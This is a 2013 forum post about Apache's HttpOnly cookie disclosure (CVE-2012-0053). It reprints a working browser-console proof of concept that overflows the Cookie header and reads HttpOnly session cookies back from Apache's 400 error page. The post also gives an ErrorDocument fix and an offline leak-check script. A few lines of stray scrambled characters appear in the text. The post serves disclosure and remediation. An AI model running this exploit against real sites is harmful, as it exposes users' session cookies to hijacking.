中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Apache HttpOnly Cookie XSS vulnerability

Author: admin    Posted: 2013-4-19 19:15
Title: Apache HttpOnly Cookie XSS vulnerability
Many applications, including commercial and mature open-source CMS and article systems, set the HttpOnly attribute on their cookies so that an XSS payload cannot read document.cookie and steal the user's session; this limits what an XSS can do. The issue described here defeats that protection: the cookie is not read through JavaScript at all, but recovered from an Apache error page that echoes the request's Cookie header back to the browser.

Open the target site in Chrome, press F12 to open the developer tools, switch to the Console, paste the following code and press Enter:
// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
    // Construct string for cookie value
    var str = "";
    for (var i=0; i< 819; i++) {
        str += "x";
    }
    // Set cookies: 10 cookies of 819 bytes push the request's Cookie header
    // past Apache's default header size limit, so the server answers 400
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss"+i+"="+str+";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();
    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content (the default Apache
            // 400 page prints the offending header inside <pre>...</pre>)
            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
            if (content && content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                // Drop the padding cookies, keep everything else (HttpOnly ones included)
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i=0; i<cookies.length; i++) {
                    var s_c = cookies[i].split('=',2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}
makeRequest();

The 400 Bad Request response that comes back contains the full Cookie header of the request, HttpOnly cookies included, and the alert shows them.
+ i8 S" b1 ?) Q7 K* _3 ?- m4 E4 p" N. @* _5 T
Download: https://gist.github.com/pilate/1955a1c28324d4724b7b/download

Fix:

The Apache documentation (http://httpd.apache.org/docs/2.0/mod/core.html#errordocument) offers four ways of handling errors:

# H# @: F( o& ]* s& P  FIn the event of a problem or error, Apachecan be configured to do one of four things,2 E  y! t4 N: b% d1 E

1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error

In testing, only method 2 works for the 400 error: with a customized message the response no longer contains the cookie contents.

Apache configuration:

ErrorDocument 400 " security test"

Of course, upgrading Apache to the latest version also fixes it :).

Reference: http://httpd.apache.org/security/vulnerabilities_22.html (the httpOnly cookie disclosure is tracked there as CVE-2012-0053, fixed in 2.2.22)
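The PoC above only parses the error page inside a live browser, so the following is an added example (my own code, not from the original post or the exploit-db PoC) that isolates the parsing half of the technique and runs offline under Node.js. It builds the same padding cookies, extracts whatever the 400 page echoes back, and checks the two outcomes the fix section describes: an unpatched server whose default 400 page leaks the Cookie header, and a server with a customized ErrorDocument 400 that leaks nothing. Both response bodies are constructed for illustration, not captured from a real server, and the session cookie name and value are assumptions.

```javascript
// Added example, not the original PoC. Sample responses are constructed.

// Build the "xssN=xxxx..." padding cookies. 10 cookies of 819 bytes, as in
// the PoC, push the Cookie header past Apache's default LimitRequestFieldSize
// of 8190 bytes, which is what triggers the 400 response.
function buildPaddingCookies(count, size) {
  var pad = new Array(size + 1).join("x");
  var out = [];
  for (var i = 0; i < count; i++) {
    out.push("xss" + i + "=" + pad + ";path=/");
  }
  return out;
}

// Parse the Cookie header that Apache's default 400 page echoes inside
// <pre>...</pre>. Returns name -> value with the padding cookies removed, or
// an empty object when nothing is echoed (patched server, or a customized
// ErrorDocument 400 whose body has no <pre> block).
function extractLeakedCookies(status, body) {
  var leaked = {};
  if (status !== 400) {
    return leaked;
  }
  var m = body.replace(/\r|\n/g, "").match(/<pre>(.+?)<\/pre>/);
  if (!m) {
    return leaked; // nothing echoed: not exploitable as-is
  }
  var header = m[1].replace(/^\s*Cookie:\s*/, "");
  var parts = header.replace(/xss\d+=x+;?/g, "").split(";");
  for (var i = 0; i < parts.length; i++) {
    var pair = parts[i].trim();
    if (!pair) continue;
    var eq = pair.indexOf("=");
    var name = eq === -1 ? pair : pair.slice(0, eq);
    var value = eq === -1 ? "" : pair.slice(eq + 1);
    leaked[name] = value;
  }
  return leaked;
}

// Convenience check for a scanner: does this response leak any cookie?
function leaksCookies(status, body) {
  return Object.keys(extractLeakedCookies(status, body)).length > 0;
}

// Constructed sample of an unpatched Apache 2.2 default 400 page. The
// HttpOnly session cookie (assumed name PHPSESSID) rides along because the
// browser attaches it to the request regardless of HttpOnly.
var VULNERABLE_400 =
  "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n" +
  "<html><head>\n<title>400 Bad Request</title>\n</head><body>\n" +
  "<h1>Bad Request</h1>\n<p>Your browser sent a request that this server could not understand.<br />\n" +
  "Size of a request header field exceeds server limit.<br />\n" +
  "<pre>\nCookie: PHPSESSID=0123456789abcdef; " +
  buildPaddingCookies(10, 819).map(function (c) { return c.split(";")[0]; }).join("; ") +
  "\n</pre>\n</p>\n</body></html>\n";

// Constructed sample of the same server after: ErrorDocument 400 " security test"
var HARDENED_400 = " security test";

console.log(extractLeakedCookies(400, VULNERABLE_400)); // { PHPSESSID: '0123456789abcdef' }
console.log(leaksCookies(400, HARDENED_400));           // false
```

To turn this into a check against a real server, send a request whose Cookie header exceeds the limit (for example with the padding cookies from buildPaddingCookies) and pass the status and body to leaksCookies; a server fronted by a proxy or load balancer that rejects oversized headers itself will not show the leak even if the Apache behind it is unpatched, so test the origin directly where possible.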





Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2